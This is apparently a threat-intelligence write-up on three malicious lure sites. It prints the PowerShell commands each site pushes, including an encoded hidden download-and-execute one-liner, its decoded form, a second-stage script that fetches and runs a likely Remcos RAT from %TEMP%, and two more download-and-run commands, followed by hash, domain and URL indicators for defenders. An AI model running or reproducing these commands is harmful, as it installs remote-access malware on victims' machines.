1] https[:]//human-bot-view[.]chalnlizt[.]org:

	[+] PowerShell Command:
	
			PowerShell.exe -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYgBjAC4AYQB4AC8AMgA1AFcAZQBMADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIA
	
	[+] PowerShell Decoded Command:
	
			powershell -W Hidden -c "iex (iwr https[:]//bc[.]ax/25WeL4 -UseBasicParsing).Content"
	
	[+] 2nd stage URL:
		
		- https[:]//bc[.]ax/25WeL4 (the content served by this URL is shown below)
		
				# Second-stage script served from the bc[.]ax URL above (defanged as pasted).
				# As written it does three things: download a ZIP into %TEMP%, expand it, and
				# launch an executable from the extracted folder.
				$webClient = New-Object System.Net.WebClient
				# Third-stage archive; its SHA-256 is listed under IOCs as docpzip.zip.
				$url1 = "https[:]//challinksch[.]com/docpzip[.]zip"
				# Written to %TEMP% under a different name (mfiles.zip) than the server-side file name.
				$zipPath1 = "$env:TEMP\mfiles.zip"
				$webClient.DownloadFile($url1, $zipPath1)
				# Extraction target, also under the user's %TEMP%.
				$extractPath1 = "$env:TEMP\mfile"
				Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
				# Runs the dropped binary from %TEMP%\mfile\; ixploren.exe's hash is in the IOC list
				# (flagged there as likely Remcos RAT). Detection angle: a process created by
				# powershell.exe with an image path under %TEMP%. The msimg32.dll hash listed with
				# it suggests a DLL shipped in the same archive — not confirmed from this listing.
				Start-Process -FilePath $env:TEMP\mfile\ixploren.exe
	
	[+] IOCs
	
		[-] SHA-256: 
		
				4dfd03f81e75f12e8fd5ab2a4cbddc7ee9c695ff271390bad05538e04597b811 - docpzip.zip
				08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2 - ixploren.exe (highly likely Remcos RAT)
				a6846a51472a6a42a4f2d4cfb4a79980ebe6b01b80da4ac4ca4a5c3fb022be1e - msimg32.dll (Suspicious DLL)
		
		[-] Domains:
			
				human-bot-view[.]chalnlizt[.]org
				challinksch[.]com
				bc[.]ax
			
		[-] URLs:
			
				https[:]//human-bot-view[.]chalnlizt[.]org
				https[:]//challinksch[.]com/docpzip[.]zip
				https[:]//bc[.]ax/25WeL4

2] https[:]//challinksch[.]com:

	[+] PowerShell Command:
	
			PowerShell -Command "(New-Object Net.WebClient).DownloadFile('https[:]//the[.]earth[.]li/~sgtatham/putty/latest/w64/putty[.]exe', $env:TEMP + '\CaptionBot.exe'); Start-Process $env:TEMP'\CaptionBot.exe'"

	[+] IOCs
		
		[-] Domain:
		
				challinksch[.]com
			
		[-] URL:

				https[:]//challinksch[.]com

3] https[:]//generete-nav-correios[.]space-to-rent[.]com:

	[+] PowerShell Command:
	
			PowerShell -W Hidden -Command "Invoke-WebRequest -Uri 'http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi' -OutFile $env:TEMP\modecorreiosrastreio.msi; Start-Process $env:TEMP\modecorreiosrastreio.msi"
	
	[+] IOCs
	
		[-] Domains:
			
				ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com
			
		[-] IP:
		
				15[.]228[.]128[.]188
			
		[-] URL:
		
				http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi
